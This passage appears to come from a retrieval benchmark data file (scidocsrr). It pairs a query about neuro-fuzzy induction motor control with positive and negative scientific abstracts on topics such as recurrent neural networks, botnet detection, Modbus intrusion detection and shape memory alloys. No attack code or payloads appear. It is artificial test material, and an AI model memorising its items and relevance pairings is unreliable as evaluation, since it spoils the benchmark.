satisfaction.\n\n\nCONCLUSIONS\nThe results may serve to help distinguish elements in emergency department nurses' work and life that are related to compassion satisfaction and may identify factors associated with higher levels of compassion fatigue and burnout.\n\n\nCLINICAL RELEVANCE\nImproving recognition and awareness of compassion satisfaction, compassion fatigue, and burnout among emergency department nurses may prevent emotional exhaustion and help identify interventions that will help nurses remain empathetic and compassionate professionals.",
"title": ""
},
{
"docid": "5e721beeca26693426fbf9c5c6044942",
"text": "• Parameters affecting the direct capital costs of BWRO and SWRO plants were assessed. • Plants delivered through EPC contracts were considered. • Assessment was based on cost data from 950 RO plants in the GCC and southern Europe. • Plant capacity, type, award year, and region were found to affect RO CAPEX cost. • A model was also developed and verified for RO CAPEX estimation. a b s t r a c t a r t i c l e i n f o The installation of reverse osmosis (RO) desalination plants has been on the rise throughout the world. Thus, the estimation of their capital cost (CAPEX) is of major importance for governments, potential investors and consulting engineers of the industry. In this paper, parameters potentially affecting the direct capital costs of brackish water RO (BWRO) and seawater RO (SWRO) desalination plants, delivered through Engineering, Procurement & Construction (EPC) contracts, were assessed. The assessment was conducted based on cost data from 950 RO desalination plants contracted in the Gulf Cooperation Council (GCC) countries and in five southern European countries. The parameters assessed include plant capacity, location, award year, feed salinity, and the cumulative installed capacity within a region. Our results showed that plant capacity has the strongest correlation with the EPC cost. Plant type (SWRO or BWRO), plant award year and the region of the RO plant were also found to be statistically important. By utilizing multiple linear regression, a model was also developed to estimate the direct CAPEX (EPC cost) of RO desalination plants to be located either in the GCC countries or southern Europe, which was then verified using the k-fold test. In 2009, over 15,000 desalination plants were in operation worldwide with approximately half of them being reverse osmosis (RO) plants [1]. Although many countries have begun to utilize desalination to produce drinking water, no region of the world has implemented desalination as widely as the Middle East, where 50% of the world's production of desalinated water is installed [1]. Over the past 40 years, use of RO has been gradually gaining momentum in the Gulf Cooperation Council (GCC) countries, due to its lower cost, simplicity, novelties in the membrane fabrication, and the high salt rejection accomplished by RO membranes today [1–4]. It is foreseen that RO will play a key role in increasing fresh water availability globally in the future, but more so in …",
"title": ""
},
{
"docid": "5f007e018f9abc74d1d7d188cd077fe7",
"text": "Due to the intensified need for improved information security, many organisations have established information security awareness programs to ensure that their employees are informed and aware of security risks, thereby protecting themselves and their profitability. In order for a security awareness program to add value to an organisation and at the same time make a contribution to the field of information security, it is necessary to have a set of methods to study and measure its effect. The objective of this paper is to report on the development of a prototype model for measuring information security awareness in an international mining company. Following a description of the model, a brief discussion of the application results is presented. a 2006 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "a2a633c972cb84d9b7d27e347bb59cfa",
"text": "This study investigated three-dimensional (3D) texture as a possible diagnostic marker of Alzheimer’s disease (AD). T1-weighted magnetic resonance (MR) images were obtained from 17 AD patients and 17 age and gender-matched healthy controls. 3D texture features were extracted from the circular 3D ROIs placed using a semi-automated technique in the hippocampus and entorhinal cortex. We found that classification accuracies based on texture analysis of the ROIs varied from 64.3% to 96.4% due to different ROI selection, feature extraction and selection options, and that most 3D texture features selected were correlated with the mini-mental state examination (MMSE) scores. The results indicated that 3D texture could detect the subtle texture differences between tissues in AD patients and normal controls, and texture features of MR images in the hippocampus and entorhinal cortex might be related to the severity of AD cognitive impairment. These results suggest that 3D texture might be a useful aid in AD diagnosis.",
"title": ""
}
] | scidocsrr |
ef1832fdfc697649796dc59c4a2ddcd9 | A virtual electrical drive control laboratory: Neuro-fuzzy control of induction motors | [
{
"docid": "1e9c7c97256e7778dbb1ef4f09c1b28e",
"text": "A new neural paradigm called diagonal recurrent neural network (DRNN) is presented. The architecture of DRNN is a modified model of the fully connected recurrent neural network with one hidden layer, and the hidden layer comprises self-recurrent neurons. Two DRNN's are utilized in a control system, one as an identifier called diagonal recurrent neuroidentifier (DRNI) and the other as a controller called diagonal recurrent neurocontroller (DRNC). A controlled plant is identified by the DRNI, which then provides the sensitivity information of the plant to the DRNC. A generalized dynamic backpropagation algorithm (DBP) is developed and used to train both DRNC and DRNI. Due to the recurrence, the DRNN can capture the dynamic behavior of a system. To guarantee convergence and for faster learning, an approach that uses adaptive learning rates is developed by introducing a Lyapunov function. Convergence theorems for the adaptive backpropagation algorithms are developed for both DRNI and DRNC. The proposed DRNN paradigm is applied to numerical problems and the simulation results are included.",
"title": ""
}
] | [
{
"docid": "b7944edc9e6704cbf59489f112f46c11",
"text": "The basic paradigm of asset pricing is in vibrant f lux. The purely rational approach is being subsumed by a broader approach based upon the psychology of investors. In this approach, security expected returns are determined by both risk and misvaluation. This survey sketches a framework for understanding decision biases, evaluates the a priori arguments and the capital market evidence bearing on the importance of investor psychology for security prices, and reviews recent models. The best plan is . . . to profit by the folly of others. — Pliny the Elder, from John Bartlett, comp. Familiar Quotations, 9th ed. 1901. IN THE MUDDLED DAYS BEFORE THE RISE of modern finance, some otherwisereputable economists, such as Adam Smith, Irving Fisher, John Maynard Keynes, and Harry Markowitz, thought that individual psychology affects prices.1 What if the creators of asset-pricing theory had followed this thread? Picture a school of sociologists at the University of Chicago proposing the Deficient Markets Hypothesis: that prices inaccurately ref lect all available information. A brilliant Stanford psychologist, call him Bill Blunte, invents the Deranged Anticipation and Perception Model ~or DAPM!, in which proxies for market misvaluation are used to predict security returns. Imagine the euphoria when researchers discovered that these mispricing proxies ~such * Hirshleifer is from the Fisher College of Business, The Ohio State University. This survey was written for presentation at the American Finance Association Annual Meetings in New Orleans, January, 2001. I especially thank the editor, George Constantinides, for valuable comments and suggestions. I also thank Franklin Allen, the discussant, Nicholas Barberis, Robert Bloomfield, Michael Brennan, Markus Brunnermeier, Joshua Coval, Kent Daniel, Ming Dong, Jack Hirshleifer, Harrison Hong, Soeren Hvidkjaer, Ravi Jagannathan, Narasimhan Jegadeesh, Andrew Karolyi, Charles Lee, Seongyeon Lim, Deborah Lucas, Rajnish Mehra, Norbert Schwarz, Jayanta Sen, Tyler Shumway, René Stulz, Avanidhar Subrahmanyam, Siew Hong Teoh, Sheridan Titman, Yue Wang, Ivo Welch, and participants of the Dice Finance Seminar at Ohio State University for very helpful discussions and comments. 1 Smith analyzed how the “overweening conceit” of mankind caused labor to be underpriced in more enterprising pursuits. Young workers do not arbitrage away pay differentials because they are prone to overestimate their ability to succeed. Fisher wrote a book on money illusion; in The Theory of Interest ~~1930!, pp. 493–494! he argued that nominal interest rates systematically fail to adjust sufficiently for inf lation, and explained savings behavior in relation to self-control, foresight, and habits. Keynes ~1936! famously commented on animal spirits in stock markets. Markowitz ~1952! proposed that people focus on gains and losses relative to reference points, and that this helps explain the pricing of insurance and lotteries. THE JOURNAL OF FINANCE • VOL. LVI, NO. 4 • AUGUST 2001",
"title": ""
},
{
"docid": "48f8c5ac58e9133c82242de9aff34fc1",
"text": "In recent years, the botnet phenomenon is one of the most dangerous threat to Internet security, which supports a wide range of criminal activities, including distributed denial of service (DDoS) attacks, click fraud, phishing, malware distribution, spam emails, etc. An increasing number of botnets use Domain Generation Algorithms (DGAs) to avoid detection and exclusion by the traditional methods. By dynamically and frequently generating a large number of random domain names for candidate command and control (C&C) server, botnet can be still survive even when a C&C server domain is identified and taken down. This paper presents a novel method to detect DGA botnets using Collaborative Filtering and Density-Based Clustering. We propose a combination of clustering and classification algorithm that relies on the similarity in characteristic distribution of domain names to remove noise and group similar domains. Collaborative Filtering (CF) technique is applied to find out bots in each botnet, help finding out offline malwares infected-machine. We implemented our prototype system, carried out the analysis of a huge amount of DNS traffic log of Viettel Group and obtain positive results.",
"title": ""
},
{
"docid": "f74dd570fd04512dc82aac9d62930992",
"text": "A compact microstrip-line ultra-wideband (UWB) bandpass filter (BPF) using the proposed stub-loaded multiple-mode resonator (MMR) is presented. This MMR is formed by loading three open-ended stubs in shunt to a simple stepped-impedance resonator in center and two symmetrical locations, respectively. By properly adjusting the lengths of these stubs, the first four resonant modes of this MMR can be evenly allocated within the 3.1-to-10.6 GHz UWB band while the fifth resonant frequency is raised above 15.0GHz. It results in the formulation of a novel UWB BPF with compact-size and widened upper-stopband by incorporating this MMR with two interdigital parallel-coupled feed lines. Simulated and measured results are found in good agreement with each other, showing improved UWB bandpass behaviors with the insertion loss lower than 0.8dB, return loss higher than 14.3dB, and maximum group delay variation less than 0.64ns in the realized UWB passband",
"title": ""
},
{
"docid": "48317f6959b4a681e0ff001c7ce3e7ee",
"text": "We introduce the challenge of using machine learning effectively in space applications and motivate the domain for future researchers. Machine learning can be used to enable greater autonomy to improve the duration, reliability, cost-effectiveness, and science return of space missions. In addition to the challenges provided by the nature of space itself, the requirements of a space mission severely limit the use of many current machine learning approaches, and we encourage researchers to explore new ways to address these challenges.",
"title": ""
},
{
"docid": "decf4fc57d5f81050b11a4faf233b3b1",
"text": "A large number of cognitive neuroscience studies point to the similarities in the neural circuits activated during the generation, imagination, as well as observation of one's own and other's behavior. Such findings support the shared representations account of social cognition, which is suggested to provide the basic mechanism for social interaction. Mental simulation may also be a representational tool to understand the self and others. However, successfully navigating these shared representations--both within oneself and between individuals--constitutes an essential functional property of any autonomous agent. It will be argued that self-awareness and agency, mediated by the temporoparietal (TPJ) area and the prefrontal cortex, are critical aspects of the social mind. Thus, differences as well as similarities between self and other representations at the neural level may be related to the degrees of self-awareness and agency. Overall, these data support the view that social cognition draws on both domain-general mechanisms and domain-specific embodied representations.",
"title": ""
},
{
"docid": "5e333f4620908dc643ceac8a07ff2a2d",
"text": "Convolutional Neural Networks (CNNs) have reached outstanding results in several complex visual recognition tasks, such as classification and scene parsing. CNNs are composed of multiple filtering layers that perform 2D convolutions over input images. The intrinsic parallelism in such a computation kernel makes it suitable to be effectively accelerated on parallel hardware. In this paper we propose a highly flexible and scalable architectural template for acceleration of CNNs on FPGA devices, based on the cooperation between a set of software cores and a parallel convolution engine that communicate via a tightly coupled L1 shared scratchpad. Our accelerator structure, tested on a Xilinx Zynq XC-Z7045 device, delivers peak performance up to 80 GMAC/s, corresponding to 100 MMAC/s for each DSP slice in the programmable fabric. Thanks to the flexible architecture, convolution operations can be scheduled in order to reduce input/output bandwidth down to 8 bytes per cycle without degrading the performance of the accelerator in most of the meaningful use-cases.",
"title": ""
},
{
"docid": "8ba1621257292f04bb6fa2328ba5abda",
"text": "In this paper we propose an explicit computer model for learning natural language syntax based on Angluin's (1982) efficient induction algorithms, using a complete corpus of grammatical example sentences. We use these results to show how inductive inference methods may be applied to learn substantial, coherent subparts of at least one natural language – English – that are not susceptible to the kinds of learning envisioned in linguistic theory. As two concrete case studies, we show how to learn English auxiliary verb sequences (such as could be taking, will have been taking) and the sequences of articles and adjectives that appear before noun phrases (such as the very old big deer). Both systems can be acquired in a computationally feasible amount of time using either positive examples, or, in an incremental mode, with implicit negative examples (examples outside a finite corpus are considered to be negative examples). As far as we know, this is the first computer procedure that learns a full-scale range of noun subclasses and noun phrase structure. The generalizations and the time required for acquisition match our knowledge of child language acquisition for these two cases. More importantly, these results show that just where linguistic theories admit to highly irregular subportions, we can apply efficient automata-theoretic learning algorithms. Since the algorithm works only for fragments of language syntax, we do not believe that it suffices for all of language acquisition. Rather, we would claim that language acquisition is nonuniform and susceptible to a variety of acquisition strategies; this algorithm may be one these.",
"title": ""
},
{
"docid": "911c101ed07b1c1aac05c3e8513c60c3",
"text": "The Modbus/TCP protocol is commonly used in SCADA systems for communications between a human–machine interface (HMI) and programmable logic controllers (PLCs). This paper presents a model-based intrusion detection system designed specifically for Modbus/TCP networks. The approach is based on the key observation that Modbus traffic to and from a specific PLC is highly periodic; as a result, each HMI-PLC channel can be modeled using its own unique deterministic finite automaton (DFA). An algorithm is presented that can automatically construct the DFA associated with an HMI-PLC channel based on about 100 captured messages. The resulting DFA-based intrusion detection system looks deep into Modbus/TCP packets and produces a very detailed traffic model. This approach is very sensitive and is able to flag anomalies such as a message appearing out of its position in the normal sequence or a message referring to a single unexpected bit. The intrusion detection approach is tested on a production Modbus system. Despite its high sensitivity, the system has a very low false positive rate—perfect matches of the model to the traffic were observed for five of the seven PLCs tested without a single false alarm over 111 h of operation. Furthermore, the intrusion detection system successfully flagged real anomalies that were caused by technicians who were troubleshooting the HMI system. The system also helped identify a PLC that was configured incorrectly. & 2013 Elsevier B.V. All rights reserved.",
"title": ""
},
{
"docid": "3c86c8681deb58a319c2aa27c795b9a1",
"text": "By means of the Ginzburg-Landau theory of phase transitions, we study a non-isothermal model to characterize the austenite-martensite transition in shape memory alloys. In the first part of this paper, the onedimensional model proposed in [3] is modified by varying the expression of the free energy. In this way, the description of the phenomenon of hysteresis, typical of these materials, is improved and the related stressstrain curves are recovered. Then, a generalization of this model to the three dimensional case is proposed and its consistency with the principles of thermodynamics is proved. Unlike other three dimensional models, the transition is characterized by a scalar valued order parameter φ and the Ginzburg-Landau equation, ruling the evolution of φ, allows us to prove a maximum principle, ensuring the boundedness of φ itself.",
"title": ""
},
{
"docid": "95a038d92ed94e7a1cefdfab1db18c1d",
"text": "Arcing in PV systems has caused multiple residential and commercial rooftop fires. The National Electrical Code® (NEC) added section 690.11 to mitigate this danger by requiring arc-fault circuit interrupters (AFCI). Currently, the requirement is only for series arc-faults, but to fully protect PV installations from arc-fault-generated fires, parallel arc-faults must also be mitigated effectively. In order to de-energize a parallel arc-fault without module-level disconnects, the type of arc-fault must be identified so that proper action can be taken (e.g., opening the array for a series arc-fault and shorting for a parallel arc-fault). In this work, we investigate the electrical behavior of the PV system during series and parallel arc-faults to (a) understand the arcing power available from different faults, (b) identify electrical characteristics that differentiate the two fault types, and (c) determine the location of the fault based on current or voltage of the faulted array. This information can be used to improve arc-fault detector speed and functionality.",
"title": ""
},
{
"docid": "75b0c2009aa648bfa1007416b193a567",
"text": "Many domain-specific search tasks are initiated by document-length queries, e.g., patent invalidity search aims to find prior art related to a new (query) patent. We call this type of search Query Document Search. In this type of search, the initial query document is typically long and contains diverse aspects (or sub-topics). Users tend to issue many queries based on the initial document to retrieve relevant documents. To help users in this situation, we propose a method to suggest diverse queries that can cover multiple aspects of the query document. We first identify multiple query aspects and then provide diverse query suggestions that are effective for retrieving relevant documents as well being related to more query aspects. In the experiments, we demonstrate that our approach is effective in comparison to previous query suggestion methods.",
"title": ""
},
{
"docid": "337d77c84241135d958e98b64014ad40",
"text": "Three-dimensional (3D) image acquisition systems are rapidly becoming more affordable, especially systems based on commodity electronic cameras. At the same time, personal computers with graphics hardware capable of displaying complex 3D models are also becoming inexpensive enough to be available to a large population. As a result, there is potentially an opportunity to consider new virtual reality applications as diverse as cultural heritage and retail sales that will allow people to view realistic 3D objects on home computers. Although there are many physical techniques for acquiring 3D data—including laser scanners, structured light and time-of-flight—there is a basic pipeline of operations for taking the acquired data and producing a usable numerical model. We look at the fundamental problems of range image registration, line-of-sight errors, mesh integration, surface detail and color, and texture mapping. In the area of registration we consider both the problems of finding an initial global alignment using manual and automatic means, and refining this alignment with variations of the Iterative Closest Point methods. To account for scanner line-of-sight errors we compare several averaging approaches. In the area of mesh integration, that is finding a single mesh joining the data from all scans, we compare various methods for computing interpolating and approximating surfaces. We then look at various ways in which surface properties such as color (more properly, spectral reflectance) can be extracted from acquired imagery. Finally, we examine techniques for producing a final model representation that can be efficiently rendered using graphics hardware.",
"title": ""
},
{
"docid": "3b2ddbef9ee3e5db60e2b315064a02c3",
"text": "It is indispensable to understand and analyze industry structure and company relations from documents, such as news articles, in order to make management decisions concerning supply chains, selection of business partners, etc. Analysis of company relations from news articles requires both a macro-viewpoint, e.g., overviewing competitor groups, and a micro-viewpoint, e.g., grasping the descriptions of the relationship between a specific pair of companies collaborating. Research has typically focused on only the macro-viewpoint, classifying each company pair into a specific relation type. In this paper, to support company relation analysis from both macro-and micro-viewpoints, we propose a method that extracts collaborative/competitive company pairs from individual sentences in Web news articles by applying a Markov logic network and gather extracted relations from each company pair. By this method, we are able not only to perform clustering of company pairs into competitor groups based on the dominant relations of each pair (macro-viewpoint) but also to know how each company pair is described in individual sentences (micro-viewpoint). We empirically confirmed that the proposed method is feasible through analysis of 4,661 Web news articles on the semiconductor and related industries.",
"title": ""
},
{
"docid": "d40cff7f20708ff80b50909029f939d3",
"text": "In this paper, we present an assessment of NFC (near field communication) for future mobile payment systems. NFC is expected to become a very trendy technology for mobile services, more specifically for mobile payments. The objective of our paper is to evaluate in a systematic manner the potential of NFC as an upcoming technology for mobile payments. In order to ensure the rigor of our research, we used a formal and structured approach based on multi-actor multi-criteria methods. Our research provides one of the first assessment of NFC and a realistic picture of the current Swiss situation as we involved numerous mobile payment experts. Our findings show that Swiss industry experts are quite enthusiastic about the future of NFC.",
"title": ""
},
{
"docid": "57ea5e1d282fc47989bdd1c997e07cbf",
"text": "a r t i c l e i n f o This study investigates the moderating effect of recommendation source credibility on the causal relationships between informational factors and recommendation credibility, as well as its moderating effect on the causal relationship between recommendation credibility and recommendation adoption. Using data from 199 responses from a leading online consumer discussion forum in China, we find that recommendation source credibility significantly moderates two informational factors' effects on readers' perception of recommendation credibility, each in a different direction. Further, we find that source credibility negatively moderates the effect of recommendation credibility on recommendation adoption. Traditional word-of-mouth (WOM) has been shown to play an important role on consumers' purchase decisions (e.g., [2]). With the popularization of the Internet, more and more consumers have shared their past consuming experiences (i.e., online consumer recommendation) online, and researchers often refer to this online WOM as electronic word-of-mouth (eWOM). Given the distinct characteristics of Internet communication (e.g., available to individuals without the limitation of time and location, directed to multiple individuals simultaneously), eWOM has conquered known limitations of traditional WOM. In general, eWOM has global reach and influence. In China, many online consumer discussion forums support eWOM, and much previous research [3,7,12,13,21] demonstrates that because eWOM provides indirect purchasing knowledge to readers, the recommendations on these forums can significantly affect their attitudes towards various kinds of consuming targets (e.g., stores, products and services). Various prior studies have postulated large numbers of antecedent factors which can affect information readers' cognition towards the recommendations, and many of them stem from elaboration likelihood model (ELM) (e. that there are two distinct routes that can affect information readers' attitude toward presented information: (1) the central route that considers the attitude formation (or change) as the result of the receivers' diligent consideration of the content of the information (informational factors); and (2) the peripheral route that requires less cognitive work attuned to simple cues in the information to influence attitude (information-irrelevant factors). ELM suggests two factors, named information readers' motivation and ability, can be the significant moderators to shift the effects of central and peripheral factors on readers' perception of information credibility. Other researchers [24,27] posit that the peripheral factor – source credibility – may also have a moderating rather than a direct effect on the causal relationship between the informational factors and the information credibility; this view is consistent with the attribution inference …",
"title": ""
},
{
"docid": "9c951a9bf159c073471107bd3c1663ee",
"text": "Collision tumor means the coexistence of two adjacent, but histologically distinct tumors without histologic admixture in the same tissue or organ. Collision tumors involving ovaries are extremely rare. We present a case of 45-year-old parous woman with a left dermoid cyst, with unusual imaging findings, massive ascites and peritoneal carcinomatosis. The patient underwent cytoreductive surgery. The histopathology revealed a collision tumor consisting of an invasive serous cystadenocarcinoma and a dermoid cyst.",
"title": ""
},
{
"docid": "24d55c65807e4a90fb0dffb23fc2f7bc",
"text": "This paper presents a comprehensive study of deep correlation features on image style classification. Inspired by that, correlation between feature maps can effectively describe image texture, and we design various correlations and transform them into style vectors, and investigate classification performance brought by different variants. In addition to intralayer correlation, interlayer correlation is proposed as well, and its effectiveness is verified. After showing the effectiveness of deep correlation features, we further propose a learning framework to automatically learn correlations between feature maps. Through extensive experiments on image style classification and artist classification, we demonstrate that the proposed learnt deep correlation features outperform several variants of convolutional neural network features by a large margin, and achieve the state-of-the-art performance.",
"title": ""
},
{
"docid": "eb627274abac685976f74217e106ce8a",
"text": "Phenylpropanoids may act as nonsteroidal anti-inflammatory drug (NSAID)-like compounds. 4-cis, 8-cis-Bis (4-hydroxy-3-methoxyphenyl)-3, 7-dioxabicyclo-[3.3.0]octane-2,6-dione (bis-FA, compound 2), a dimer of ferulic acid, was synthesized from ferulic acid (1), and its effect on lipopolysaccharide (LPS)-stimulated cyclooxygenase-2 (COX-2) expression in RAW 264.7 cells was compared with those of the parent ferulic acid (1) and of iso-ferulic acid (3-hydroxy-4-methoxycinnamic acid) (3). LPS-induced gene expression of COX-2 was markedly inhibited by compound 2 at a concentration of 10 microM and by compound 3 at 100 microM, but was not inhibited by compound 1 at 100 microM. This observation suggests that compound 2 may possess potent anti-inflammatory activity. These ferulic acid-related compounds were able to scavenge the stable 1, 1-diphenyl-2-picrylhydrazyl (DPPH) radical. The 50% inhibitory concentration for DPPH radicals declined in the order 3 (40.20 mM) > 2 (3.16 mM) > 1 (0.145 mM). Compound 1 possessed potent anti-radical activity, but no COX-2 inhibitory activity, which may be a result of enhancement of its conjugate properties by abstraction of an H atom from the phenolic OH group, causing loss of phenolic function. In contrast, inhibition of COX-2 expression by compounds 2 and 3 could be caused by their increased phenolic function, which is associated with decreased anti-radical activity. Compounds 2 and 3, particularly 2, may have potential as NSAID-like compounds.",
"title": ""
},
{
"docid": "774d5a1072fc18229975f1886afe2caa",
"text": "Previous studies have shown that with advancing age the size of the dental pulp cavity is reduced as a result of secondary dentine deposit, so that measurements of this reduction can be used as an indicator of age. The aim of the present study was to find a method which could be used to estimate the chronological age of an adult from measurements of the size of the pulp on full mouth dental radiographs. The material consisted of periapical radiographs from 100 dental patients who had attended the clinics of the Dental Faculty in Oslo. The radiographs of six types of teeth from each jaw were measured: maxillary central and lateral incisors and second premolars, and mandibular lateral incisors, canines and first premolars. To compensate for differences in magnification and angulation on the radiographs, the following ratios were calculated: pulp/root length, pulp/tooth length, tooth/root length and pulp/root width at three different levels. Statistical analyses showed that Pearson's correlation coefficient between age and the different ratios for each type of tooth was significant, except for the ratio between tooth and root length, which was, therefore, excluded from further analysis. Principal component analyses were performed on all ratios, followed by regression analyses with age as dependent variable and the principal components as independent variables. The principal component analyses showed that only the two first of them had significant influence on age, and a good and easily calculated approximation to the first component was found to be the mean of all the ratios. A good approximation to the second principal component was found to be the difference between the mean of two width ratios and the mean of two length ratios, and these approximations of the first and second principal components were chosen as predictors in regression analyses with age as the dependent variable. The coefficient of determination (r2) for the estimation was strongest when the ratios of the six teeth were included (r2 = 0.76) and weakest when measurements from the mandibular canines alone were included (r2 = 0.56). Measurement on dental radiographs may be a non-invasive technique for estimating the age of adults, both living and dead, in forensic work and in archaeological studies, but the method ought to be tested on an independent sample.",
"title": ""
}
] | scidocsrr |
3439d981bf62de851f1d7d695df797d1 | AutoCog: Measuring the Description-to-permission Fidelity in Android Applications | [
{
"docid": "b91c93a552e7d7cc09d477289c986498",
"text": "Application Programming Interface (API) documents are a typical way of describing legal usage of reusable software libraries, thus facilitating software reuse. However, even with such documents, developers often overlook some documents and build software systems that are inconsistent with the legal usage of those libraries. Existing software verification tools require formal specifications (such as code contracts), and therefore cannot directly verify the legal usage described in natural language text of API documents against the code using that library. However, in practice, most libraries do not come with formal specifications, thus hindering tool-based verification. To address this issue, we propose a novel approach to infer formal specifications from natural language text of API documents. Our evaluation results show that our approach achieves an average of 92% precision and 93% recall in identifying sentences that describe code contracts from more than 2500 sentences of API documents. Furthermore, our results show that our approach has an average 83% accuracy in inferring specifications from over 1600 sentences describing code contracts.",
"title": ""
},
{
"docid": "2ab6b91f6e5e01b3bb8c8e5c0fbdcf24",
"text": "Application markets such as Apple’s App Store and Google’s Play Store have played an important role in the popularity of smartphones and mobile devices. However, keeping malware out of application markets is an ongoing challenge. While recent work has developed various techniques to determine what applications do, no work has provided a technical approach to answer, what do users expect? In this paper, we present the first step in addressing this challenge. Specifically, we focus on permissions for a given application and examine whether the application description provides any indication for why the application needs a permission. We present WHYPER, a framework using Natural Language Processing (NLP) techniques to identify sentences that describe the need for a given permission in an application description. WHYPER achieves an average precision of 82.8%, and an average recall of 81.5% for three permissions (address book, calendar, and record audio) that protect frequentlyused security and privacy sensitive resources. These results demonstrate great promise in using NLP techniques to bridge the semantic gap between user expectations and application functionality, further aiding the risk assessment of mobile applications.",
"title": ""
}
] | [
{
"docid": "0fb16cdc0b8b8371493fb57cbfacec4f",
"text": "Recent years have seen an expansion of interest in non-pharmacological interventions for attention-deficit/hyperactivity disorder (ADHD). Although considerable treatment development has focused on cognitive training programs, compelling evidence indicates that intense aerobic exercise enhances brain structure and function, and as such, might be beneficial to children with ADHD. This paper reviews evidence for a direct impact of exercise on neural functioning and preliminary evidence that exercise may have positive effects on children with ADHD. At present, data are promising and support the need for further study, but are insufficient to recommend widespread use of such interventions for children with ADHD.",
"title": ""
},
{
"docid": "28b2da27bf62b7989861390a82940d88",
"text": "End users are said to be “the weakest link” in information systems (IS) security management in the workplace. they often knowingly engage in certain insecure uses of IS and violate security policies without malicious intentions. Few studies, however, have examined end user motivation to engage in such behavior. to fill this research gap, in the present study we propose and test empirically a nonmalicious security violation (NMSV) model with data from a survey of end users at work. the results suggest that utilitarian outcomes (relative advantage for job performance, perceived security risk), normative outcomes (workgroup norms), and self-identity outcomes (perceived identity match) are key determinants of end user intentions to engage in NMSVs. In contrast, the influences of attitudes toward security policy and perceived sanctions are not significant. this study makes several significant contributions to research on security-related behavior by (1) highlighting the importance of job performance goals and security risk perceptions on shaping user attitudes, (2) demonstrating the effect of workgroup norms on both user attitudes and behavioral intentions, (3) introducing and testing the effect of perceived identity match on user attitudes and behavioral intentions, and (4) identifying nonlinear relationships between constructs. this study also informs security management practices on the importance of linking security and business objectives, obtaining user buy-in of security measures, and cultivating a culture of secure behavior at local workgroup levels in organizations. KeY words and PHrases: information systems security, nonlinear construct relationships, nonmalicious security violation, perceived identity match, perceived security risk, relative advantage for job performance, workgroup norms. information sYstems (is) securitY Has become a major cHallenGe for organizations thanks to the increasing corporate use of the Internet and, more recently, wireless networks. In the 2010 computer Security Institute (cSI) survey of computer security practitioners in u.S. organizations, more than 41 percent of the respondents reported security incidents [68]. In the united Kingdom, a similar survey found that 45 percent of the participating companies had security incidents in 2008 [37]. While the causes for these security incidents may be difficult to fully identify, it is generally understood that insiders from within organizations pose a major threat to IS security [36, 55]. For example, peer-to-peer file-sharing software installed by employees may cause inadvertent disclosure of sensitive business information over the Internet [41]. Employees writing down passwords on a sticky note or choosing easy-to-guess passwords may risk having their system access privilege be abused by others [98]. the 2010 cSI survey found that nonmalicious insiders are a big issue [68]. according to the survey, more than 14 percent of the respondents reported that nearly all their losses were due to nonmalicious, careless behaviors of insiders. Indeed, end users are often viewed as “the weakest link” in the IS security chain [73], and fundamentally IS security has a “behavioral root” [94]. uNDErStaNDING NONMalIcIOuS SEcurItY VIOlatIONS IN tHE WOrKPlacE 205 a frequently recommended organizational measure for dealing with internal threats posed by end user behavior is security policy [6]. For example, a security policy may specify what end users should (or should not) do with organizational IS assets, and it may also spell out the consequences of policy violations. Having a policy in place, however, does not necessarily guarantee security because end users may not always act as prescribed [7]. a practitioner survey found that even if end users were aware of potential security problems related to their actions, many of them did not follow security best practices and continued to engage in behaviors that could open their organizations’ IS to serious security risks [62]. For example, the survey found that many employees allowed others to use their computing devices at work despite their awareness of possible security implications. It was also reported that many end users do not follow policies and some of them knowingly violate policies without worry of repercussions [22]. this phenomenon raises an important question: What factors motivate end users to engage in such behaviors? the role of motivation has not been considered seriously in the IS security literature [75] and our understanding of the factors that motivate those undesirable user behaviors is still very limited. to fill this gap, the current study aims to investigate factors that influence end user attitudes and behavior toward organizational IS security. the rest of the paper is organized as follows. In the next section, we review the literature on end user security-related behaviors. We then propose a theoretical model of nonmalicious security violation and develop related hypotheses. this is followed by discussions of our research methods and data analysis. In the final section, we discuss our findings, implications for research and practice, limitations, and further research directions.",
"title": ""
},
{
"docid": "76d4ed8e7692ca88c6b5a70c9954c0bd",
"text": "Custom-tailored products are meant by the products having various sizes and shapes to meet the customer’s different tastes or needs. Thus fabrication of custom-tailored products inherently involves inefficiency. Custom-tailoring shoes are not an exception because corresponding shoe-lasts must be custom-ordered. It would be nice if many template shoe-lasts had been cast in advance, the most similar template was identified automatically from the custom-ordered shoe-last, and only the different portions in the template shoe-last could be machined. To enable this idea, the first step is to derive the geometric models of template shoe-lasts to be cast. Template shoe-lasts can be derived by grouping all the various existing shoe-lasts into manageable number of groups and by uniting all the shoe-lasts in each group such that each template shoe-last for each group barely encloses all the shoe-lasts in the group. For grouping similar shoe-lasts into respective groups, similarity between shoe-lasts should be quantized. Similarity comparison starts with the determination of the closest pose between two shapes in consideration. The closest pose is derived by comparing the ray distances while one shape is virtually rotated with respect to the other. Shape similarity value and overall similarity value calculated from ray distances are also used for grouping. A prototype system based on the proposed methodology has been implemented and applied to grouping of the shoe-lasts of various shapes and sizes and deriving template shoe-lasts. q 2004 Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "c7f23ddb60394659cdf48ea4df68ae6b",
"text": "OBJECTIVES\nWe hypothesized reduction of 30 days' in-hospital morbidity, mortality, and length of stay postimplementation of the World Health Organization's Surgical Safety Checklist (SSC).\n\n\nBACKGROUND\nReductions of morbidity and mortality have been reported after SSC implementation in pre-/postdesigned studies without controls. Here, we report a randomized controlled trial of the SSC.\n\n\nMETHODS\nA stepped wedge cluster randomized controlled trial was conducted in 2 hospitals. We examined effects on in-hospital complications registered by International Classification of Diseases, Tenth Revision codes, length of stay, and mortality. The SSC intervention was sequentially rolled out in a random order until all 5 clusters-cardiothoracic, neurosurgery, orthopedic, general, and urologic surgery had received the Checklist. Data were prospectively recorded in control and intervention stages during a 10-month period in 2009-2010.\n\n\nRESULTS\nA total of 2212 control procedures were compared with 2263 SCC procedures. The complication rates decreased from 19.9% to 11.5% (P < 0.001), with absolute risk reduction 8.4 (95% confidence interval, 6.3-10.5) from the control to the SSC stages. Adjusted for possible confounding factors, the SSC effect on complications remained significant with odds ratio 1.95 (95% confidence interval, 1.59-2.40). Mean length of stay decreased by 0.8 days with SCC utilization (95% confidence interval, 0.11-1.43). In-hospital mortality decreased significantly from 1.9% to 0.2% in 1 of the 2 hospitals post-SSC implementation, but the overall reduction (1.6%-1.0%) across hospitals was not significant.\n\n\nCONCLUSIONS\nImplementation of the WHO SSC was associated with robust reduction in morbidity and length of in-hospital stay and some reduction in mortality.",
"title": ""
},
{
"docid": "4729691ffa6e252187a1a663e85fde8b",
